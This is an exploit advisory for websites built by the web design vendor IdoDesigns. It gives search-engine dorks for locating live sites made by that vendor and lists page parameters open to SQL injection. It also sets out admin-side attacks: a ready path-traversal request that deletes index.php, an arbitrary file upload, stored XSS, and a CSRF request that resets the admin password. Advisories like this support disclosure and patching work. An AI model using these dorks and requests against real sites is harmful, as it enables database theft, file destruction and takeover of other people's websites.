@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > IdoDesigns - Multiple Vulnerabilities
.:. Google Dorks .:.
"Design by www.idodesigns.in"
"Web Design by : www.idodesigns.in"
"Design by : I DO Designs"
You may use the dorks followed by inurl:?id= like ["Design by : I DO Designs" inurl:?id=]
.:. Date: March 05,2025
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.idodesigns.in/
.:. Product Version -> 1.0
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Most PHP pages failed to secure parameters from SQLi resulting in Unauthorised SQL Injection with some using Base64 to help secure it but its insufficient, examples:
/blog-details.php?id=
/services-details.php?id=
/gallery-more.php?id=
/award-details.php?id=
/program-details.php?id=
/project-details.php?id=
/photos.php?id=
Admin Page [Authenticated] Multiple Exploits
1- Authenticated Arbitrary File Deletion:
Parameter -> image
GET https://site/ADMIN PAGE/blogAdd.php?delete_image=&img_id=1&id=3&image=../../../index.php
2- Authenticated Arbitrary File Upload:
POST https://site/ADMIN PAGE/blogAdd.php?edit=1&id=3
Parameter -> images[]
3- Stored XSS:
Most [POST] requests to edit pages or posts or users have vulnerable parameters that store XSS which can result in website defacement
4- CSRF is possible to update admin password
File: /site/admin page/changePassword.php
parameters & data: new_pwd=x&confirm_pwd=x&submit=